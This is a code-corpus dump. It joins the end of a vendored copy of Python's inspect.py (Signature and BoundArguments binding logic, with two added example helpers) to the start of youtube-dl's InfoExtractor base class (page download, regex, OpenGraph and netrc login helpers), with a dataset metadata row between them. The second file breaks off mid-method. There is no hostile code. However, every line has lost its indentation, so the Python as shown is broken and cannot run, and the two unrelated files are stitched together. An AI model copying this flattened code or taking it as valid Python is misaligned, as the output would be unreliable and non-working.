kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def apply_defaults(self):
"""Set default values for missing arguments.
For variable-positional arguments (*args) the default is an
empty tuple.
For variable-keyword arguments (**kwargs) the default is an
empty dict.
"""
arguments = self.arguments
new_arguments = []
for name, param in self._signature.parameters.items():
try:
new_arguments.append((name, arguments[name]))
except KeyError:
if param.default is not _empty:
val = param.default
elif param.kind is _VAR_POSITIONAL:
val = ()
elif param.kind is _VAR_KEYWORD:
val = {}
else:
# This BoundArguments was likely produced by
# Signature.bind_partial().
continue
new_arguments.append((name, val))
self.arguments = OrderedDict(new_arguments)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, BoundArguments):
return NotImplemented
return (self.signature == other.signature and
self.arguments == other.arguments)
def __setstate__(self, state):
self._signature = state['_signature']
self.arguments = state['arguments']
def __getstate__(self):
return {'_signature': self._signature, 'arguments': self.arguments}
def __repr__(self):
args = []
for arg, value in self.arguments.items():
args.append('{}={!r}'.format(arg, value))
return '<{} ({})>'.format(self.__class__.__name__, ', '.join(args))
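# Illustrative sketch (not part of the original module): how a BoundArguments
# instance exposes bound values.  The sample function is hypothetical; its
# Signature is obtained through signature(), defined further below.
def _example_bound_arguments():
    def sample(a, b=2, *rest, flag=False):
        return a
    ba = signature(sample).bind(1, 5, 7)
    ba.apply_defaults()
    # ba.arguments == {'a': 1, 'b': 5, 'rest': (7,), 'flag': False}
    # ba.args      == (1, 5, 7)
    # ba.kwargs    == {'flag': False}
    return sample(*ba.args, **ba.kwargs)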
class Signature:
"""A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is set to `Signature.empty`.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
"""
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, *, return_annotation=_empty,
__validate_parameters__=True):
"""Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
"""
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
kind_defaults = False
for idx, param in enumerate(parameters):
kind = param.kind
name = param.name
if kind < top_kind:
msg = (
'wrong parameter order: {} parameter before {} '
'parameter'
)
msg = msg.format(_get_paramkind_descr(top_kind),
_get_paramkind_descr(kind))
raise ValueError(msg)
elif kind > top_kind:
kind_defaults = False
top_kind = kind
if kind in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD):
if param.default is _empty:
if kind_defaults:
# No default for this parameter, but the
# previous parameter of the same kind had
# a default
msg = 'non-default argument follows default ' \
'argument'
raise ValueError(msg)
else:
# There is a default for this parameter.
kind_defaults = True
if name in params:
msg = 'duplicate parameter name: {!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = types.MappingProxyType(params)
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
"""Constructs Signature for the given python function.
Deprecated since Python 3.5, use `Signature.from_callable()`.
"""
warnings.warn("inspect.Signature.from_function() is deprecated since "
"Python 3.5, use Signature.from_callable()",
DeprecationWarning, stacklevel=2)
return _signature_from_function(cls, func)
@classmethod
def from_builtin(cls, func):
"""Constructs Signature for the given builtin function.
Deprecated since Python 3.5, use `Signature.from_callable()`.
"""
warnings.warn("inspect.Signature.from_builtin() is deprecated since "
"Python 3.5, use Signature.from_callable()",
DeprecationWarning, stacklevel=2)
return _signature_from_builtin(cls, func)
@classmethod
def from_callable(cls, obj, *, follow_wrapped=True):
"""Constructs Signature for the given callable object."""
return _signature_from_callable(obj, sigcls=cls,
follow_wrapper_chains=follow_wrapped)
@property
def parameters(self):
return self._parameters
@property
def return_annotation(self):
return self._return_annotation
def replace(self, *, parameters=_void, return_annotation=_void):
"""Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
"""
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def _hash_basis(self):
params = tuple(param for param in self.parameters.values()
if param.kind != _KEYWORD_ONLY)
kwo_params = {param.name: param for param in self.parameters.values()
if param.kind == _KEYWORD_ONLY}
return params, kwo_params, self.return_annotation
def __hash__(self):
params, kwo_params, return_annotation = self._hash_basis()
kwo_params = frozenset(kwo_params.values())
return hash((params, kwo_params, return_annotation))
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, Signature):
return NotImplemented
return self._hash_basis() == other._hash_basis()
def _bind(self, args, kwargs, *, partial=False):
"""Private method. Don't use directly."""
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
# No default, not VAR_KEYWORD, not VAR_POSITIONAL,
# not in `kwargs`
if partial:
parameters_ex = (param,)
break
else:
msg = 'missing a required argument: {arg!r}'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments') from None
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError(
'too many positional arguments') from None
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError(
'multiple values for argument {arg!r}'.format(
arg=param.name)) from None
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
if param.kind == _VAR_POSITIONAL:
# Named arguments don't refer to '*args'-like parameters.
# We only arrive here if the positional arguments ended
# before reaching the last parameter before *args.
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('missing a required argument: {arg!r}'. \
format(arg=param_name)) from None
else:
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError(
'got an unexpected keyword argument {arg!r}'.format(
arg=next(iter(kwargs))))
return self._bound_arguments_cls(self, arguments)
def bind(*args, **kwargs):
"""Get a BoundArguments object, that maps the passed `args`
and `kwargs` to the function's signature. Raises `TypeError`
if the passed arguments can not be bound.
"""
return args[0]._bind(args[1:], kwargs)
def bind_partial(*args, **kwargs):
"""Get a BoundArguments object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises `TypeError` if the passed arguments can not be bound.
"""
return args[0]._bind(args[1:], kwargs, partial=True)
def __reduce__(self):
return (type(self),
(tuple(self._parameters.values()),),
{'_return_annotation': self._return_annotation})
def __setstate__(self, state):
self._return_annotation = state['_return_annotation']
def __repr__(self):
return '<{} {}>'.format(self.__class__.__name__, self)
def __str__(self):
result = []
render_pos_only_separator = False
render_kw_only_separator = True
for param in self.parameters.values():
formatted = str(param)
kind = param.kind
if kind == _POSITIONAL_ONLY:
render_pos_only_separator = True
elif render_pos_only_separator:
# It's not a positional-only parameter, and the flag
# is set to 'True' (there were pos-only params before.)
result.append('/')
render_pos_only_separator = False
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
if render_pos_only_separator:
# There were only positional-only parameters, hence the
# flag was not reset to 'False'
result.append('/')
rendered = '({})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {}'.format(anno)
return rendered
def signature(obj, *, follow_wrapped=True):
"""Get a signature object for the passed callable."""
return Signature.from_callable(obj, follow_wrapped=follow_wrapped)
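# Illustrative sketch (not part of the original module): a typical
# introspection flow built on signature().  All function names below are
# hypothetical.
def _example_signature():
    def base(x, y=0, *, scale=1.0):
        return (x + y) * scale
    @functools.wraps(base)
    def wrapper(*args, **kwargs):
        return base(*args, **kwargs)
    followed = signature(wrapper)               # follows __wrapped__ to base
    # str(followed) == '(x, y=0, *, scale=1.0)'
    raw = signature(wrapper, follow_wrapped=False)
    # str(raw) == '(*args, **kwargs)'
    bound = followed.bind(2, y=3)
    bound.apply_defaults()
    # bound.arguments == {'x': 2, 'y': 3, 'scale': 1.0}
    return followed, raw, bound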
def _main():
""" Logic for inspecting an object given at command line """
import argparse
import importlib
parser = argparse.ArgumentParser()
parser.add_argument(
'object',
help="The object to be analysed. "
"It supports the 'module:qualname' syntax")
parser.add_argument(
'-d', '--details', action='store_true',
help='Display info about the module rather than its source code')
args = parser.parse_args()
target = args.object
mod_name, has_attrs, attrs = target.partition(":")
try:
obj = module = importlib.import_module(mod_name)
except Exception as exc:
msg = "Failed to import {} ({}: {})".format(mod_name,
type(exc).__name__,
exc)
print(msg, file=sys.stderr)
exit(2)
if has_attrs:
parts = attrs.split(".")
obj = module
for part in parts:
obj = getattr(obj, part)
if module.__name__ in sys.builtin_module_names:
print("Can't get info for builtin modules.", file=sys.stderr)
exit(1)
if args.details:
print('Target: {}'.format(target))
print('Origin: {}'.format(getsourcefile(module)))
print('Cached: {}'.format(module.__cached__))
if obj is module:
print('Loader: {}'.format(repr(module.__loader__)))
if hasattr(module, '__path__'):
print('Submodule search path: {}'.format(module.__path__))
else:
try:
__, lineno = findsource(obj)
except Exception:
pass
else:
print('Line: {}'.format(lineno))
print('\n')
else:
print(getsource(obj))
if __name__ == "__main__":
_main()
|
FFMG/myoddweb.piger
|
monitor/api/python/Python-3.7.2/Lib/inspect.py
|
Python
|
gpl-2.0
| 117,615
|
[
"VisIt"
] |
5ad6bf302604e4c80e052cdaa22321d16a1a2cef12a0bbceb21ef5334b3c87bd
|
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import re
import socket
import sys
import time
import xml.etree.ElementTree
from ..compat import (
compat_cookiejar,
compat_HTTPError,
compat_http_client,
compat_urllib_error,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
age_restricted,
clean_html,
compiled_regex_type,
ExtractorError,
float_or_none,
int_or_none,
RegexNotFoundError,
sanitize_filename,
unescapeHTML,
)
_NO_DEFAULT = object()
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
    The type field determines the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* ext Will be calculated from url if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
                                 Calculated from the format_id, width, height,
                                 and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", or "m3u8_native".
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language_preference Is this in the correct requested
language?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_method HTTP method to use for the download.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* http_post_data Additional data to send with a POST
request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
* "resolution" (optional, string "{width}x{height"},
deprecated)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
creator: The main artist who created the video.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
location: Physical location where the video was filmed.
subtitles: The subtitle file contents as a dictionary in the format
{language: subtitles}.
duration: Length of the video in seconds, as an integer.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
average_rating: Average rating given by users, the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
webpage_url: The url to the video webpage; if given to youtube-dl it
should allow getting the same result again. (It will be set
by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "title" and "id" attributes with the same
semantics as videos (see above).
_type "multi_video" indicates that there are multiple videos that
form a single show, for example multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_WORKING = True
def __init__(self, downloader=None):
"""Constructor. Receives an optional downloader."""
self._ready = False
self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return m.group('id')
@classmethod
def working(cls):
"""Getter method for _WORKING."""
return cls._WORKING
def initialize(self):
"""Initializes an instance (authentication, etc)."""
if not self._ready:
self._real_initialize()
self._ready = True
def extract(self, url):
"""Extracts URL information and returns it in list of dicts."""
try:
self.initialize()
return self._real_extract(url)
except ExtractorError:
raise
except compat_http_client.IncompleteRead as e:
raise ExtractorError('A network error has occurred.', cause=e, expected=True)
except (KeyError, StopIteration) as e:
raise ExtractorError('An extractor error has occurred.', cause=e)
def set_downloader(self, downloader):
"""Sets the downloader for this IE."""
self._downloader = downloader
def _real_initialize(self):
"""Real initialization process. Redefine in subclasses."""
pass
def _real_extract(self, url):
"""Real extraction process. Redefine in subclasses."""
pass
@classmethod
def ie_key(cls):
"""A string for getting the InfoExtractor with get_info_extractor"""
return cls.__name__[:-2]
@property
def IE_NAME(self):
return type(self).__name__[:-2]
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True):
""" Returns the response handle """
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True):
""" Returns a tuple (page content as string, URL handle) """
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal)
return (content, urlh)
def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None):
content_type = urlh.headers.get('Content-Type', '')
webpage_bytes = urlh.read()
if prefix is not None:
webpage_bytes = prefix + webpage_bytes
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
if self._downloader.params.get('dump_intermediate_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
self.to_screen('Dumping request to ' + url)
dump = base64.b64encode(webpage_bytes).decode('ascii')
self._downloader.to_screen(dump)
if self._downloader.params.get('write_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
basen = '%s_%s' % (video_id, url)
if len(basen) > 240:
h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
basen = basen[:240 - len(h)] + h
raw_filename = basen + '.dump'
filename = sanitize_filename(raw_filename, restricted=True)
self.to_screen('Saving request to ' + filename)
# Working around MAX_PATH limitation on Windows (see
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
if os.name == 'nt':
absfilepath = os.path.abspath(filename)
if len(absfilepath) > 259:
filename = '\\\\?\\' + absfilepath
with open(filename, 'wb') as outf:
outf.write(webpage_bytes)
try:
content = webpage_bytes.decode(encoding, 'replace')
except LookupError:
content = webpage_bytes.decode('utf-8', 'replace')
if ('<title>Access to this site is blocked</title>' in content and
'Websense' in content[:512]):
msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
blocked_iframe = self._html_search_regex(
r'<iframe src="([^"]+)"', content,
'Websense information URL', default=None)
if blocked_iframe:
msg += ' Visit %s for more details' % blocked_iframe
raise ExtractorError(msg, expected=True)
return content
def _download_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, tries=1, timeout=5):
""" Returns the data of the page as a string """
success = False
try_count = 0
while success is False:
try:
res = self._download_webpage_handle(url_or_request, video_id, note, errnote, fatal)
success = True
except compat_http_client.IncompleteRead as e:
try_count += 1
if try_count >= tries:
raise e
self._sleep(timeout, video_id)
if res is False:
return res
else:
content, _ = res
return content
def _download_xml(self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True):
"""Return the xml as an xml.etree.ElementTree.Element"""
xml_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal)
if xml_string is False:
return xml_string
if transform_source:
xml_string = transform_source(xml_string)
return xml.etree.ElementTree.fromstring(xml_string.encode('utf-8'))
def _download_json(self, url_or_request, video_id,
note='Downloading JSON metadata',
errnote='Unable to download JSON metadata',
transform_source=None,
fatal=True):
json_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal)
if (not fatal) and json_string is False:
return None
return self._parse_json(
json_string, video_id, transform_source=transform_source, fatal=fatal)
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None):
"""Returns a url that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
return video_info
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
def _search_regex(self, pattern, string, name, default=_NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Perform a regex search on the given string, using a single pattern or a
list of patterns, returning the first matching group.
In case of failure return a default value or raise a WARNING or a
RegexNotFoundError, depending on fatal, specifying the field name.
"""
if isinstance(pattern, (str, compat_str, compiled_regex_type)):
mobj = re.search(pattern, string, flags)
else:
for p in pattern:
mobj = re.search(p, string, flags)
if mobj:
break
if not self._downloader.params.get('no_color') and os.name != 'nt' and sys.stderr.isatty():
_name = '\033[0;34m%s\033[0m' % name
else:
_name = name
if mobj:
if group is None:
# return the first matching group
return next(g for g in mobj.groups() if g is not None)
else:
return mobj.group(group)
elif default is not _NO_DEFAULT:
return default
elif fatal:
raise RegexNotFoundError('Unable to extract %s' % _name)
else:
self._downloader.report_warning('unable to extract %s; '
'please report this issue on http://yt-dl.org/bug' % _name)
return None
def _html_search_regex(self, pattern, string, name, default=_NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_login_info(self):
"""
Get the login info as (username, password)
It will look in the netrc file using the _NETRC_MACHINE value
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
username = None
password = None
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get('username', None) is not None:
username = downloader_params['username']
password = downloader_params['password']
elif downloader_params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(self._NETRC_MACHINE)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError('No authenticators for %s' % self._NETRC_MACHINE)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning('parsing .netrc: %s' % compat_str(err))
return (username, password)
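# Editor's note: when 'usenetrc' is enabled, the lookup above expects a
# standard ~/.netrc entry for the machine named by _NETRC_MACHINE, roughly:
#   machine <_NETRC_MACHINE value> login <username> password <password>
# (illustrative format only, not taken from the original source)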
def _get_tfa_info(self):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor', None) is not None:
return downloader_params['twofactor']
return None
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^>]+?)"|\'([^>]+?)\')'
property_re = r'(?:name|property)=[\'"]og:%s[\'"]' % re.escape(prop)
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
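# Editor's note: the two templates above are meant to match OpenGraph meta
# tags in either attribute order, e.g. for prop == 'title':
#   <meta property="og:title" content="Some title" />
#   <meta content="Some title" name="og:title">
# (example markup only)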
def _og_search_property(self, prop, html, name=None, **kargs):
if name is None:
name = 'OpenGraph %s' % prop
escaped = self._search_regex(self._og_regexes(prop), html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
def _og_search_thumbnail(self, html, **kargs):
return self._og_search_property('image', html, 'thumbnail url', fatal=False, **kargs)
def _og_search_description(self, html, **kargs):
return self._og_search_property('description', html, fatal=False, **kargs)
def _og_search_title(self, html, **kargs):
return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
def _og_search_url(self, html, **kargs):
return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if display_name is None:
display_name = name
return self._html_search_regex(
r'''(?isx)<meta
(?=[^>]+(?:itemprop|name|property)=(["\']?)%s\1)
[^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(name),
html, display_name, fatal=fatal, group='content', **kwargs)
def _dc_search_uploader(self, html):
return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower(), None)
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta('isFamilyFriendly', html)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower(), None)
def _twitter_search_player(self, html):
